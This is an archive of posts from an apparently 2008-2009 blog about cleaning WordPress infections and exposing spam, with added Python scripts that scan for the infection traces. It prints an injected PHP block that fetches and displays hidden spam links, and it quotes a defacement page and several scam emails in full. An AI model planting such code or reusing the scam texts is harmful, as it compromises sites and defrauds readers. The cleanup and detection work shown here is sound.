Posted November 3rd, 2009, in: Computer Problems and Fixes| Evil Robots| Humanity, Culture, Philosophy, Politics, Ethics Etc| Marketing/Advertising In The Cloud| SEO, SEM, SMO Etc| Technology| WordPress
The site links to sites that are also under attack, and when the bug is running correctly on those sites, they redirect the hits to the final destination, which is http://www.zml.com/
I don’t know if zml.com knows this is happening. I mean I suppose it’s possible that some unscrupulous SEO or Marketing guy promised them traffic and then resorted to this to get it. I’m contacting them now to inform them of this uncool practice being committed on their behalf, and if they are not willing to cooperate on putting an end to it, I will have no choice but to give them some negative attention.
The process of extracting the bad links from the content was long and hard since the strings of code inserted were very inconsistent.
The following is a list of the sites being linked thru, which I assume are all victims of this malware. If you own one of these sites, feel free to drop me a line and I will point you in the right direction as far as putting an end to this.
Message to ZML:
Hello,
I am a developer and recently one of my clients who is running WordPress for her personal website was attacked by some Malware that inserted thousands of links throughout her content. Those links resolve to your site, but via redirects thru other sites that I assume are also victims of the malware.
You look like you’ve built a pretty nice site here. And I’m writing to give you the chance to get on board with fixing this problem before I am forced to create some negative attention in the blogosphere and social media.
It doesn’t seem like you would want to be responsible for malware. But it also doesn’t seem like anyone would go through the trouble to make all these links back to you unless you were paying them. Perhaps you hired some marketing or SEO people and were not aware that they would be using these tactics? Please write back soon as I have very little patience for this kind of thing.
Thanks,
Andrew A. Peterson
Some samples of weird code that the bot inserted:
<wp:tag><wp:tag_slug>%d0%b0%d0%b2%d1%82%d0%be%d1%80%d1%81%d0%ba%d0%b8%d0%b5-%d0%bf%d1%80%d0%be%d0%b3%d1%80%d0%b0%d0%bc%d0%bc%d1%8b</wp:tag_slug><wp:tag_name><![CDATA[????????? ?????????]]></wp:tag_name></wp:tag>
<wp:tag><wp:tag_slug>%d1%81%d0%b2%d0%be%d0%b1%d0%be%d0%b4%d0%bd%d1%8b%d0%b9-%d0%bc%d0%b8%d0%ba%d1%80%d0%be%d1%84%d0%be%d0%bd</wp:tag_slug><wp:tag_name><![CDATA[????????? ????????]]></wp:tag_name></wp:tag>
Posted June 18th, 2009, in: Computer Problems and Fixes| Evil Robots| Technology| WordPress
Thanks to SomewwhereVille for helping me diagnose… Here’s what I removed from header.php (in all the installed themes, not just the active one):
<?php
/* wp_remote_fopen procedure */
$wp_remote_fopen='aHR0cDovL3F3ZXRyby5jb20vc3Mv';
$opt_id='62f751b6518fcbe2ab5980b9f1349902';
$blarr=get_option('cache_vars');
if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.'.md5'))!=md5($blarr)){
    $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.'.txt'));
    update_option('cache_vars',$blarr);
}
$blarr=unserialize(base64_decode(get_option('cache_vars')));
if($blarr['hide_text']!='' && sizeof($blarr['links'])>0){
    if($blarr['random']){
        $new='';
        foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k];
        $blarr['links']=$new;
    }
    $txt_out='';
    foreach($blarr['links'] as $k=>$v) $txt_out.='<a href="'.$v.'">'.$k.'</a>';
    echo str_replace('[LINKS]',$txt_out,$blarr['hide_text']);
}
/* wp_remote_fopen procedure */
?>
After removing this crap, I recommend installing WP Security Scan. It’s a pretty badass little plugin that walks you through doing some not-so-obvious things to protect WP from attacks. For instance, if your hosting scenario allows, you can rename all your Database Tables to have a Prefix other than “wp_”
Who knew that was the thing to do? I didn’t. It also scans your WP install for risky file permissions and weak passwords and a few other things.
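A check for the injected header.php block itself, run over every installed theme rather than only the active one, as an added example (not code from this post or from WP Security Scan). The marker names, the sample file and the `c2.example.invalid` address are constructed for illustration; the patterns come from the block quoted above.

```python
import base64
import binascii
import re
import tempfile
from pathlib import Path

# Traits of the injected block quoted in the post: a remote fetch through
# wp_remote_fopen() of a base64-decoded address, and a payload cached in the
# options table under the name 'cache_vars' and unserialized on every page load.
MARKERS = {
    "remote_fetch": re.compile(r"wp_remote_fopen\s*\(\s*base64_decode\s*\("),
    "cached_payload": re.compile(r"get_option\s*\(\s*['\"]cache_vars['\"]"),
    "unserialize_option": re.compile(
        r"unserialize\s*\(\s*base64_decode\s*\(\s*get_option"),
}
# Quoted literals long enough to hold an encoded URL.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")


def decode_urls(text):
    """Return URLs hidden in base64 string literals, for the analyst to review."""
    urls = []
    for literal in B64_LITERAL.findall(text):
        try:
            decoded = base64.b64decode(literal, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64, or not text (e.g. an MD5-style id)
        if decoded.startswith(("http://", "https://")):
            urls.append(decoded)
    return urls


def scan_themes(themes_dir):
    """Scan every PHP file of every installed theme, active or not."""
    findings = []
    for path in sorted(Path(themes_dir).rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        hits = sorted(name for name, rx in MARKERS.items() if rx.search(text))
        if hits:
            findings.append(
                {"file": str(path), "markers": hits, "urls": decode_urls(text)})
    return findings


# Constructed sample: an inert fragment shaped like the quoted block, pointing
# at a placeholder address instead of the one in the post.
_FAKE_B64 = base64.b64encode(b"http://c2.example.invalid/ss/").decode()
SAMPLE_HEADER = (
    "<?php /* wp_remote_fopen procedure */ $wp_remote_fopen='%s'; "
    "$blarr=get_option('cache_vars'); "
    "if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).'x.md5'))"
    "!=md5($blarr)){} "
    "$blarr=unserialize(base64_decode(get_option('cache_vars'))); ?>\n"
    % _FAKE_B64
)


def demo():
    """Build a throwaway themes directory: one clean theme, one infected unused theme."""
    with tempfile.TemporaryDirectory() as tmp:
        themes = Path(tmp) / "wp-content" / "themes"
        for name, body in (("active", "<?php wp_head(); ?>\n"),
                           ("unused", SAMPLE_HEADER)):
            (themes / name).mkdir(parents=True)
            (themes / name / "header.php").write_text(body, encoding="utf-8")
        return [(Path(f["file"]).parent.name, f["markers"], f["urls"])
                for f in scan_themes(themes)]


if __name__ == "__main__":
    for theme, markers, urls in demo():
        print(theme, markers, urls)
```

A hit on any marker means the file needs manual review; the matching `cache_vars` row in the options table should be deleted as well, since that is where the fetched payload is stored.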
Unfortunately for me, I was working on a site hosted by AN Hosting which doesn’t allow certain privileges to database users (Alter?), so I had to change our table prefixes manually.
WP Security Scan, after failing to rename the table prefixes because it didn’t have sufficient access, referred me to a nice little tutorial on how to do it manually.
Basically you:
- download your database thru PHPMyAdmin as per WordPress.org’s Documentation,
- do a “Find-And-Replace” replacing all instances of “wp_” with “somethingelse_”
- make a new database and import your “somethingelse_” version to the new database.
- Change your wp-config.php file to point at the new database
- Change your wp-config.php file’s “table prefix” line from “$table_prefix = 'wp_'” to “$table_prefix = 'somethingelse_'”
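The find-and-replace and wp-config.php steps above as a script, added here as an example (not from the tutorial the plugin links to). It goes beyond a blind replace: it rewrites the prefix only at the start of a backtick-quoted table name or of a quoted value (where WordPress keeps prefix-derived keys such as `wp_user_roles` and `wp_capabilities`), so post text that merely mentions "wp_" is left alone. The function names and the sample dump are constructed, and a mysqldump/phpMyAdmin-style export with backslash-escaped quotes is assumed.

```python
import re


def rename_prefix(dump_sql, old="wp_", new="somethingelse_"):
    """Rename the table prefix in a SQL dump without touching post content.

    Two positions are rewritten:
      * right after a backtick: table identifiers such as `wp_posts`
      * right after an unescaped opening quote: whole-value keys built from
        the prefix, e.g. 'wp_user_roles' (options table) and
        'wp_capabilities' / 'wp_user_level' (usermeta table)
    """
    pattern = re.compile(r"(`|(?<!\\)')" + re.escape(old))
    return pattern.sub(lambda m: m.group(1) + new, dump_sql)


def still_mentions(dump_sql, old="wp_"):
    """1-based line numbers that still contain the old prefix, for manual review."""
    return [n for n, line in enumerate(dump_sql.splitlines(), 1) if old in line]


def set_table_prefix(config_php, new="somethingelse_"):
    """Rewrite the $table_prefix assignment in wp-config.php text."""
    pattern = re.compile(r"""(\$table_prefix\s*=\s*)(['"])[^'"]*\2""")
    return pattern.sub(
        lambda m: m.group(1) + m.group(2) + new + m.group(2), config_php)


# Constructed sample dump (not from a real site).
SAMPLE_DUMP = """\
DROP TABLE IF EXISTS `wp_options`;
CREATE TABLE `wp_options` (`option_name` varchar(64), `option_value` longtext);
INSERT INTO `wp_options` VALUES ('wp_user_roles','a:1:{s:13:"administrator";a:0:{}}');
INSERT INTO `wp_usermeta` VALUES (1,1,'wp_capabilities','a:1:{s:13:"administrator";b:1;}');
INSERT INTO `wp_posts` VALUES (7,'Don\\'t keep the default \\'wp_\\' prefix');
"""

if __name__ == "__main__":
    renamed = rename_prefix(SAMPLE_DUMP)
    print(renamed)
    print("review lines:", still_mentions(renamed))
    print(set_table_prefix("$table_prefix  = 'wp_';"))
```

Lines reported by `still_mentions` are the ones to read by hand before importing: either ordinary content, or a value this narrow rule did not cover.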
These kinds of problems suck to have but it sure is nice to have the WordPress Community, all of us working together to combat the evil.
Posted January 30th, 2009, in: Computer Problems and Fixes| Evil Robots| Ideas, Observations, Opinions, Rants Etc| Spam and Scams| Technology| Web Browsers
I was glancing at something over at The Pirate Bay and maybe I clicked on a banner or something but damn… What is this? I’ve never seen anything like this on a Mac. Is this new? Are there new threats for Macs? Or just new Warnings?


Posted December 11th, 2008, in: Computer Problems and Fixes| Evil Robots| Technology
This attack on older versions of WordPress installs a file called index.html in the wp-admin directory so that when a user logs into their dashboard, the browser loads it rather than the index.php file that comes with WordPress. The result is that when you try to access the WordPress Dashboard, you instead get a page which says “Hacked By Guard_FB” followed by a graphic of a silhouette of a man with his fist in the air which reads “THE TURK PROTEST…”
The page then goes on with some left wing political stuff, and claims to be affiliated with a site called ateskes.org and is signed “King Defacer”
I’d rather see hacking going on for the sake of activism than for worthless spam, but this thing sucks. The blog on which I encountered this was not particularly political and so I suspect that the makers of this attack aren’t picking and choosing who they attack, which makes it evil crap.
Bottom line, keep WordPress up to date, stay on top of your comment moderation, and use WordPress’ Cookie-Encryption “Security Keys” feature in your wp-config file.
If this has happened to you, I recommend deleting your spam/comments in moderation (if there’s too many, check here), upgrading WordPress, then changing your Dashboard passwords. Of course, also delete the file called index.html in your wordpress directory’s wp-admin folder.
Full text of “Hacked By Guard_FB” Dashboard page is as follows:
Hacked By GUARD_FB
Ateskes.Org
We Accuse:
- G.W. Bush, T. Blair, and E. Olmert, the chief executives of the imperialist, colonialist, belligerent policies and actions of the US-British-Israeli coalition,
- of perpetrating the composite crimes of war of annihilation, occupation, and the premeditated mass murder of children and civilians in Palestine and Lebanon,
- following their atrocities in Afghanistan and Iraq and foreboding the same in Syria and Iran,
- sinking into utter barbarity in transgression of all universal norms of human morality.
The Following Are Also Responsible:
- All government employees and agents, advisors, civil and military functionaries who partake in collective and individual responsibility in these states;
- the legislative and judicial branches that have not curbed the criminal activities of their governments as they violate basic human rights, most significantly the right to live, and as they trample international legal norms and commit crimes against humanity;
- universities, media, intellectuals, workers and citizens who do not restrain and sanction their governments through domestic democratic channels;
- UNITED NATIONS and other national and international bodies that actively or passively support, aid and abet this illegality, crude force, and aggression –all bear responsibility for the catastrophe that is taking place.
We Demand:
- An immediate cessation of this horror,
- the due trial, in international tribunals, as well as in the courts of conscience and history,
- of, above all, Bush, Blair, and Olmert as perpetrators of crimes against humanity,
- of their respective government agents and supporters,
- of the chief executives and state personnel in all countries that have been accomplices to these crimes against humanity,
- and their removal from office by the lawful and democratic initiatives of their respective citizenry.
And We Declare:
We stand at a critical juncture in human history.
These aggressive, colonialist, exploitative, and militarist practices are negating the achievements of humanity, destroying the basic pillars of international law, and thus, threatening the present and the future of this planet.
We refuse to submit to this brutal force and be accomplices to its crimes.
We refuse to give in to the (il)logic of blood-fed economies and lethal war machines.
We declare that we will continue to struggle for a different world.
www.Ateskes.Org
King Defacer
Posted November 7th, 2008, in: Evil Robots| Scam Email Mashups
From:MR FRED SIBAYA
No.54 Palm Groove,
Braafontein
Johannesburg
South Africa
Tel/Fax+0027 86 529 0021
I am MR.FRED SIBAYA from Zimbabwe the first Son of MR JOHN SIBAYA, who was murdered in the land dispute in Zimbabwe by the agents of the ruling government of President ROBERT MUGABE, you must have heard his alleged support and sympathy for the opposition MDC PARTY led by the minority white farmers. My Father was among the few black Zimbabwean rich farmers murdered in cold blood by the war veterans backed by the government.
Before the death of my Father, he deposited the sum of US$12M (Twelve Million United State Dollars) With one of the security company in Southern Africa, as if he knew the looming danger in ZIMBABWE. The money was deposited as a gem and precious stones to avoid much attraction from the security firm. The money was earmarked for the purchase of new machinery and chemicals for the farms and the establishment of new farms in Lesotho and Swaziland before the regretted incident. This Land problem arose when President Robert Mugabe introduced a new land act. Which wholly affects the white rich farmers and some few blacks vehemently condemned the “Modus operandi” adopted by the government. This resulted to rampart killing and Mob actions.
My mother and I are staying in South Africa now as Asylum seekers, which have not been beneficial to us; I have decided to transfer this money to a foreign country where we can invest it. I am faced with the dilemma of investing this amount of money in South Africa for fear of encountering the same experience in future since both countries have the same political policy and also law does not permit us to investment hence we’re refugees. I must let you know that this business is 100% risk free. I and my family have agreed to give you 20% of the total US12M, 5% will be mapped out for all expenses that maybe incurred during the transfer 5% for any charity organization and 70% will be for me and my family’s investment in your country.
Therefore if you are willing and interested to render the needed assistance, endeavour to reply through fredsibaya0@gmail.com for more brief clarifications. I also need your private mobile, telephone and fax numbers for easy communication. Remember; this is highly confidential and the success of this business depends on how secret it is kept. Expecting your reply soonest.
Best regards,
MR.FRED SIBAYA (FOR THE FAMILY)
Posted October 6th, 2008, in: Scam Email Mashups| Spam and Scams
I find this one interesting because it doesn’t actually promise any money. Instead it offers an opportunity to help build a church in Africa, and accuses the reader of needing redemption, being a sinner (who isn’t, right?) etc…
From: david@teceng.net
I am Prophet David Johnson, I went for a prayer mission in HAITI and the Lord revealed so many things about you to me.
I see things and I reveal to people, something terrible which I have seen will happen to you, I just have to tell you, you will lose two important people you love very much, and evil will visit you personally, troubles and problems will leave with you, the things you never never believe that can happen to you, will happen. It has been dated when it will start very soon, sooner than you think.
The Lord reveal everything to me, and your email address appeared to me, after reading this message, if you believe me keep this message for your self alone do not share it with anybody, but if you don’t believe me delete this message and talk to your family, friends and relatives, tell them about the message so when things start happening to you, they will be informed, everything that will happen to you is spiritual, nobody will understand, when you even tell people what is happening to you they will never believe and understand because it is spiritual.
I have warned you now, we can prevent all this, but only if you believe God, but if you don’t believe God, wait and see what will happen.

Lord has done so much for you, that you have failed to recognize and you have been cheating God, at this time your email address was revealed to me three times, that’s why I am contacting you, do not think this is a joke or just an email because I know what will be going on in your mind, you are free to believe and disbelief this message, but when evil starts happening there is no going back, I warn you it has been destined and dated, it will start sooner than you think.
As you are reading this message I still see doubt in you, but I will stop here. If you want to prevent all this evil that will hit you soon, I will know and I will tell you what to do.
God reveal to me that you have a lot of doubt in your mind that you will doubt this message.
The reason for writing this message, is because of the strong challenge which you must have to follow to prevent all this evil which will surround you sooner, you will not see them and you can never see them, because it is spiritual, when it starts it cannot stop, it will be as if God has giving you to Satan.
Look this is not a joke, this is what I have seeing and the only prevention is for you not to doubt and do what I will tell you to do, for your soul to be covered in God’s harms. We have to take you back from the Satan if you are ready to follow God’s instructions I will tell you what to do.
I can still see even as I’m writing this message that there is plenty of doubt inside your heart and mind, but you can over power your doubt, only if the evil leaving in your heart will allow you, it will be very difficult for you to do what God’s want you to do, but you can do it only if you put doubt aside.
God told me that we will win you back, but it will be difficult because your heart has been eating by doubt, my only advice to you to remove doubt and keep this message to you self, if you don’t take my advice wait and see. This is the only way out for you to avoid this evil, you have to sow a seed in the house of the Lord, there is a church we are building in Africa, and we want you to sow a seed in contributing on that church where your name will be writing as one of the people that contributed to stand the house of the Lord where people will enter everyday and pray for you who contributed to put up the structure.
The only way out of this predicament is you must have to contribute for the building of the church, your name must be writing in the church as one of the sponsors that is where your name will be written in the book of life, the book of joy and the book of happiness things will now turn around, when the church is completed everyday service your name will be announced for the church congregation to pray for you.

So you have to sow that seed that is the only message that will take you out of this evil, you name must be writing in that church before it is completed. There’s no way back we will beg you to do this because this is the only way for the evil to turn around, I’m a prophet I don’t talk too much. But if you fail to do what you have been told now, when the predicament start even if you give all you have to the church at that time it will not work, I am warning and begging don’t ignore this message.
The church will go on 40 days fasting for you starting from the day you sow a seed for the building of the church. Contact Pastor Emmanuel Anderson, tell Pastor Anderson that you want to contribute for the building of the new church, do not tell him about what I told you, just tell him you want to contribute then ask him how you can sow a seed, do this as quick as possible, nothing is too small and nothing is too big for the Lord do not cheat God again, do this I have told you.
Give what you have never giving before, give what you feel your heart tells you, remember nothing is too small and nothing is too big for the Lord, contact Pastor Emmanuel Anderson on this e-mail (pastoranderson@faithconvenantministry.co.cc) and tell him you want to sow a seed, after you have done that, then wait and see how blessing will rain upon your life each day, how you will swim in the rivers of success and joy.
I have given you the information and message which I was asked to give you, so now it is now left for you to believe it and do what you where told or forget it. I will never write you again or reply you, I have told you what I have to tell you, after reading this message you only have two things to do, either you follow the message or not.
I wish you the best in life.
Have a blessed day.
Regards,
Prophet David Johnson.
Posted September 30th, 2008, in: Computer Problems and Fixes| Evil Robots| Ideas, Observations, Opinions, Rants Etc| New Media| SEO, SEM, SMO Etc| Spam and Scams| Technology| Web 2.0
If your blog has been deleted suddenly by WordPress.com, DON’T PANIC! …that is, unless you use your blog for phishing scams or spam-commenting or anything else that brings down the experience of other people on the Web and/or makes it harder for people to find the information they need. In that case, panic. Scream and cry. I hope your blog is permanently deleted, and everything you eat for the rest of your life tastes horrible. The Web is our garden!
Assuming you are an ethical participant of The Cloud, pretty soon you should get an email from WordPress.com explaining the nature of the take-down.
[Anyway, my blog is back, obviously. I guess I need to start backing up my blog? Jeeez. What a hassle.]
[begin story]
I regularly blog about scams/spam on the Web. It’s a way for me to be discovered by, and to provide guidance to, people who happen to be googling around about some questionable content they find or are emailed.
One example of this is this search result for “paypal-cgi.com,” a site that mimics PayPal in order to trick people into handing over their paypal login info. I come up number one for the search, and the title of the result makes it clear that you shouldn’t trust PayPal-CGI.com… If you click thru to my post, I explain why these things exist and how to detect this kind of crap.

You see, I’m actually doing something good here. And it’s good for me too.
Anyway, recently I encountered some scam crap on craigslist and blogged about it. And since my blog post contained a link to the spam/scam site I was exposing, WordPress.com’s evil-detectors went ape shit and my blog got automatically removed by wordpress.com.
I was in the middle of editing a post and suddenly my category selection buttons stopped working. And there was a thing saying something like “you do not have permission to edit this..” or something like that. When I refreshed the page, I got “The authors have deleted this blog. The content is no longer available”

…and my blog had been completely removed leaving only this scary screen saying: “This blog has been archived or suspended for a violation of our Terms of Service.”

Ironic. I got banned for merely exposing something malicious.
Current Spam-Filter technology isn’t context-aware. This is a slippery slope: Using words or links alone, without regard to context, to define what is untrustworthy content.
See the post in question for yourself HERE:
Fortunately, about an hour later, I got a message from WordPress.com:
from: Anthony – WordPress.com:
Hi,
Your blog was automatically flagged, as links to overnightcashexplosion.com were detected (and these are certainly not permitted). The blog is back – please remove all such links.
Best,
Anthony
Automattic | WordPress.com
I responded with:
if it’s a url in text, is that different in the eyes of your spam defenses from an actual link? I’d like to leave the url if possible so I can still come up in searches for that url.
What’s your take on that?
Thanks for communicating with me.
-A
Anthony from WordPress replied:
Hi,
Sure, you can leave it – I understand the context.
Best,
Anthony
Automattic | WordPress.com
So, there is a layer of discretion here? That’s good I guess.
Posted September 27th, 2008, in: Scam Email Mashups| Spam and Scams
This spam email was just too funny to me not to do. Gosh! I feel so sorry for anyone that is so computer illiterate that they could fall for something like this.
Good Day,
I have 100% legal lucrative business
proposal which will be of mutual benefit to
us,If you are Interested, kindly mail me at
(curtisanthony212@ymail.com) for more
details.
Thanks and awaiting your response.
Curtis Anthony
From: honyeeee1@singnet.com.sg
Subject: 100% legal proposal
Date: September 27, 2008 2:42:04 AM PDT
To: curtisay@wlla.com
Reply-To: curtisanthony343@jmail.co.za
Posted September 1st, 2008, in: Evil Robots| Spam and Scams
Here in one post, I will start collecting curious little spam messages and emails I get. These aren’t interesting enough to get their own posts, but I still like to be found in searches for their emails, urls etc.

Hi sweetie!I’d like to avoid any confusion, I’m writing this on behalf of my mother. She was searching for guys online and came upon your irresistible profile (her words). She’s single and HOT! She wants to experience new things, meet a great guy for dating and more! She’s very alluring, men turn around when she walks? she has very nice curves. She likes going to the movies, drinking coffee and enjoys smart conversation. She plays a few musical instruments but prefers the cello. She’s humorous, romantic and easy-going. I’d like to add that she’s a very perceptive and spiritual person. I hope you’ll write back, you sure won’t regret it. FYI, this is MY account, so don..t reply directly to this message Instead, please use her email address, MarieBashor at gmail..
Well thank you very much
http://myspace.com/269092691
Via Email From tonybenson02@yahoo.com.hk
You can now email me at: sgttonybenson002@yahoo.com
- Dear Friend, I know you would be surprised to read from someone relatively unknown to you before now. My name is Tony Benson, a master sgt. of The U.S. Marine, deployed to Iraq in the beginning of the war in 2003.I would like to share some highly personal classified information about my personal experience and role which I played in the pursuit of my career serving under the U.S ARMY which was at the fore-front of the war in Iraq. Though, I would like to hold back certai n information for security reasons for now until you have found time to visit the BBC website stated below to enable you have insight regarding what I intend to share with you, believing that it would be of your desired interest in one way or the other.Here is a BBC news listing that confirms what I share with you.http://news.bbc.co.uk/2/hi/middle_east/2988455.stm Also, could you get back to me having visited the above website to enable us discuss in a more vivid manner to the best of your understanding. I must say that I’m very uncomfortable sending this message to you without knowing truly if you would misconstrue the importance and decide to go public.In this regards,I will not hold backto say that the essence of this letter is strictly for mutual benefit of you and I and nothing more.I will be more vivid and coherent in my next email in this regards. Meanwhile,could you send me a mail confirming you have visited the site and understood my intentions?Standing by for you r response. warm regards, master sgt.Tony Benson secured email:tonybenson02@yahoo.com.hk
From MySpace
is it u there?:
http://ofthehub. com/go/ms. php?ch=cb8c411a8037611c46a0b5fba697c260
(ofthehub.com appears to be a virus thing)
I keep getting this email from “Solomon Guei” (solo.guei1@gmail.com) asking me to open an attachment:
PLEASE OPEN THE ATTACHMENT TO SEE DETAILS.
FROM SOLOMON
the attachment reads:
From: Solomon Kone Guei
I am Solomon Kone Guei from Coted Ivoire. I am 26 years old; I lost my father a couple of years ago. My father late General Robert Guei was a Ex-Military head of State of Ivory Coast until his untimely death,(You can visit http://news.bbc.co.uk/2/hi/africa/2269238.stm for complete report on this incident).
He was assassinated on the 19th of September 2002 by an unknown group of heavily armed gunmen following the political uprising. To be brief and straight to the point, before his untimely death, he deposited with a finance security company a metal safe box containing
the sum of (Twenty Million United States Dollars Only) $20 million meant for the purchase of heavy artilleries, armored tank, ammunitions and security equipments.
The security company do not know the real contents of the metal safe box is money, because he convincingly told them at the time of deposit that it only contains African Artefact treasures and computer security consumables that does not need air and sun rays, that
will be ship to his foreign business associate in abroad.
I want you to do me a favor to claim the box as my late father foreign business associate overseas in your country, so that I will come over to your country for investment and resettlement, since the present administration is no more in cordial relationship with my families.
I will go into partnership investment with you in your country, such as Real Estate and Hotel ownership this is my reason for writing to you. Please if you are willing to assist me, indicate your interest in replying soonest, I will offer you 30% only for your kind and honest assistance. Do kindly send me your direct telephone and fax numbers for an easy communication-mail me:
solo.guei@gmail.com
Mr. Solomon Guei
Posted July 15th, 2008, in: Computer Problems and Fixes| Evil Robots| Technology| Web 2.0
Recently while troubleshooting an old WordPress 2.1.3 blog, I found that when trying to publish a new post, the next page would fail to load and only get to a blank screen. Also, while looking around in the dashboard, I noticed that the default upload directory (for uploading images etc), was set to:
/../../../../../../../../../../../../../../tmp/
from CyberInsecure.com :
Wordpress blogs are mass scanned and attacked, and a new directory in wp-content folder is created in vulnerable ones. The directory is usually called /1/ and it’s full of html files containing Javascript redirects in them (doorways). There was also an infected blog with phishing pages for Google logins. Google cache already shows thousands of results with such hacked Wordpress blogs. They can be seen best by committing a search inurl:wp-content/1/ (do not visit those results, your PC might get infected). Google has already tagged some of these spam pages as harmful.
The blogs are most likely attacked by some kind of automated tool since the amounts of spam are too big to work manually on all those spam pages creation. It seems there are also spam comments in posts as well. Spam comments are pointing to internal infected blog pages in folder “1” to get them spidered and to get people to visit them.
This issue was reported to Wordpress.org, and there is an unofficial fix for this issue. The fix is based around renaming the cookies used by Wordpress by default. If the exploit is hacking the cookies by mass scanning blogs, and it looks for a specific cookie name, that would stop what is out there now but it would not fix the issue.
Recommendations: Upgrade to 2.3.3 along with immediately changing any administrator passwords. Currently older Wordpress versions, especially Wordpress 2.1.3, are attacked using “admin-ajax.php” sql injection exploit to retrieve the administrator account’s password.
Change default cookie names in your blog.
Things like this are a reason to keep your WordPress, and all other software up to date!
Reading:
http://wordpress.org/support/topic/154278
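A check for the file-level traces described in this post and in the “Hacked By Guard_FB” post (an index.html dropped into wp-admin, a wp-content/1/ directory of redirecting HTML pages, and an upload directory setting that climbs out of the site), as an added example that is not from either post or from CyberInsecure.com. The indicator names and the sample tree are constructed; the value passed to `upload_path_escapes` is assumed to be the upload directory setting read from the dashboard or the `upload_path` option.

```python
import re
import tempfile
from pathlib import Path

# Script-driven navigation, as found in doorway pages.
JS_REDIRECT = re.compile(
    r"location(?:\.href)?\s*=|location\.(?:replace|assign)\s*\(", re.I)


def check_dropped_files(wp_root):
    """Return (indicator, relative path) pairs for the artefacts the posts describe."""
    root = Path(wp_root)
    findings = []
    # WordPress ships wp-admin/index.php; the defacement added an index.html
    # next to it, which the browser was served instead.
    if (root / "wp-admin" / "index.html").is_file():
        findings.append(("wp-admin-index-html", "wp-admin/index.html"))
    # Doorway directory: wp-content/1/ filled with HTML files.
    doorway = root / "wp-content" / "1"
    if doorway.is_dir():
        for page in sorted(doorway.glob("*.htm*")):
            text = page.read_text(encoding="utf-8", errors="replace")
            kind = "doorway-redirect" if JS_REDIRECT.search(text) else "doorway-html"
            findings.append((kind, page.relative_to(root).as_posix()))
    return findings


def upload_path_escapes(upload_path):
    """True if the path uses '..' to climb above the directory it starts in."""
    depth = 0
    for part in upload_path.replace("\\", "/").split("/"):
        if part in ("", "."):
            continue
        depth += -1 if part == ".." else 1
        if depth < 0:
            return True
    return False


def demo():
    """Build a throwaway WordPress-shaped tree carrying both kinds of dropped file."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-admin").mkdir()
        (root / "wp-content" / "1").mkdir(parents=True)
        (root / "wp-admin" / "index.php").write_text("<?php // stock file\n")
        (root / "wp-admin" / "index.html").write_text("<h1>defaced</h1>\n")
        (root / "wp-content" / "1" / "a.html").write_text(
            '<script>window.location="http://doorway.example.invalid/"</script>\n')
        (root / "wp-content" / "1" / "b.html").write_text("<p>keyword text</p>\n")
        return check_dropped_files(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
    print(upload_path_escapes("/../../../../tmp/"))
```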












